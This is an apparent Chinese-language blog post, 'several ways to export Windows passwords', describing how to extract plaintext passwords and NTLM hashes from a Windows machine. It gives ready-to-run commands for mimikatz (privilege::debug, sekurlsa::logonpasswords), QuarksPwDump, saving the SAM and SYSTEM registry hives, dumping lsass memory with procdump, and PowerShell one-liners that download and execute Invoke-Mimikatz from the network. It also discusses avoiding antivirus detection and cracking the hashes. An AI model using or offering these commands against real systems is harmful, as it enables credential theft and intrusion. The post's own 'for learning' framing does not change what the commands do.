Windwos密碼匯出的幾種姿勢
這篇文章主要是介紹怎麼在本地提取使用者密碼,把知識整理了一下,把知識整理起來的威力還是挺大的。以下的方式分為要免殺和不需要免殺的方式。文章介紹的技術具有一定的攻擊性,主要用於學習。
要免殺:
1.Getapss
Getapss是由閃電小子根據mimikatz編譯的一個工具,可以獲取明文密碼。現在有32位和64位了,直接執行getpass.exe。
2.QuarksPwDump
目前可以匯出 :- Local accounts NT/LM hashes + history 本機NT/LM雜湊+歷史登入記錄 – Domain accountsNT/LM hashes + history 域中的NT/LM雜湊+歷史登入記錄– Cached domain password 快取中的域管理密碼 【這需要域管理員登陸過】。
其實這個目前不需要免殺,最新的嘗試檢驗了一下,發現不免殺處理,效果也可以用法:
Options :
-k --get-system-key
-dhl --dump-hash-local
-dhdc --dump-hash-domain-cached
-dhd --dump-hash-domain (NTDS_FILE must be specified)
-db --dump-bitlocker (NTDS_FILE must be specified)
-sf --system-file FILE
-sk --system-key KEY
-nt --ntds-file FILE
-hist --with-history (optional)
-t --output-type JOHN/LC (optional, if no=>JOHN)
-o --output FILE (optional, if no=>stdout)
Example: quarks-pwdump.exe--dump-hash-domain --with-history
quarks-pwdump.exe -dhl
3.mimikatz的利用
這個一個法國人寫的一款工具,可以得到windows明文密碼,這只是功能之一,用處還有很大。例如黃金票據的利用,這裡有介紹:http://www.freebuf.com/sectool/112594.html
第一條:privilege::debug
//提升許可權
第二條:sekurlsa::logonpasswords
//抓取密碼
不需要免殺:
1.使用登錄檔匯出hash命令:
reg save hklm\sam C:\hash\sam.hive
reg save hklm\system C:\hash\system.hive
直接執行可以把windows裡所有使用者的hash在登錄檔中匯出到檔案裡.
具體的執行命令方法有很多,這裡就不探討這個.
開啟Cain讀取匯出的登錄檔檔案的hash.
選擇Cracker.-再選擇第一個LM & NTLMhash匯入登錄檔檔案
右鍵選擇add tolist-選擇最後一個
先新增SAM檔案
再新增boot key
可以獲取hash值,hash值可以在這個網站那裡破解.
http://www.objectif-securite.ch/ophcrack.php
2.procdump
procdump是微軟官方提供的一個小工具,在微軟官方有下載
地址:https://technet.microsoft.com/en-us/sysinternals/dd996900
將工具拷貝到目標機器上執行如下命令(需要管理員許可權,我選擇的版本是64位)
Procdump64.exe -accepteula -ma lsass.exelsass.dmp
將這個記憶體dump檔案拷貝到mimikatz同目錄下,雙擊開啟mimikatz執行情況如圖:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP
mimikatz # sekurlsa::logonPasswords full
3.Powershell+mimikatz的利用
在windows中powershell是白名單來的,不需要進行免殺,可以利用直接用poweshell來呼叫mimikatz進行明文的獲取。 powershell "IEX(New-ObjectNet.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
也可以把mimikatz的poweshell檔案放在邊界的伺服器上,利用powershell可以讀取:
4.powershell+getpasshash
也是利用powershell,不過是利用getpasshash,這個還是要解hash值的。當不能夠解除hash的時候,也可以進行wce進行hash的注入。
powershell "IEX (New-ObjectNet.WebClient).DownloadString('c:/Get-PassHashes.ps1'); Get-PassHashes "
成功匯出hash
5、SAMInside
SAMInside為一款俄羅斯出品的Windows密碼恢復軟體,支援Windows NT/2000/XP/Vista作業系統,主要用來恢復Windows的使用者登入密碼。
使用說明:
匯入本地系統和檔案,當然,也可以從專案檔案、檔案匯入,注意SAM檔案是系統的SAM檔案,一般在C:\WINDOWS\system32\config路徑下,看下圖:
參考文章:
相關文章
- 解鎖canvas匯出圖片跨域的N種姿勢~Canvas跨域
- 程式設計師須知,Python匯入模組的幾種姿勢!程式設計師Python
- Python 連線 MySQL 的幾種姿勢PythonMySql
- 論JVM爆炸的幾種姿勢及自救方法JVM
- 程式碼除錯的N種姿勢除錯
- Unreal Cook Book:建立物件的的幾種姿勢(C++)Unreal物件C++
- Powershell惡意程式碼的N種姿勢
- 實戰小技巧19:List轉Map List的幾種姿勢
- SpringBoot系列Mybatis之引數傳遞的幾種姿勢Spring BootMyBatis
- 又拍雲張聰:OpenResty 動態流控的幾種姿勢REST
- SpringBoot系列之攔截器注入Bean的幾種姿勢Spring BootBean
- MYSQL資料匯出備份、匯入的幾種方式MySql
- PHP處理密碼的幾種方式PHP密碼
- MySQL修改root密碼的幾種方法MySql密碼
- Guava Cache使用的三種姿勢Guava
- 結合Spring傳送郵件的四種正確姿勢,你知道幾種?Spring
- 幾種經典密碼(classic cipher)密碼
- PHP生成隨機密碼的幾種方法PHP隨機密碼
- 建立 React 元件三種“姿勢”React元件
- PHP 檔案操作的各種姿勢PHP
- 解鎖跨域的九種姿勢跨域
- Python爬蟲的N種姿勢Python爬蟲
- 【吐血整理】Git的各種撤銷姿勢Git
- 跨頁面通訊的各種姿勢
- 特殊符號密碼處理 - 匯入匯出exp/imp符號密碼
- 企業使用資料庫的12種姿勢資料庫
- 開啟Flutter動畫的另一種姿勢——FlareFlutter動畫
- 在react中使用svg的各種騷姿勢ReactSVG
- 入門快應用的另一種姿勢
- Android Studio 專案匯入的正確姿勢Android
- 11g 匯出資料時的幾種壓縮方法
- 不想用POI?幾行程式碼完成Excel匯出匯入行程Excel
- 原始碼|使用FutureTask的正確姿勢原始碼
- 幾種結匯方式分享
- 淺談OC物件初始化的三種姿勢物件
- 關於6種Web安全常見的攻防姿勢Web
- Spring Boot 郵件傳送的 5 種姿勢!Spring Boot
- 實現同比、環比計算的N種姿勢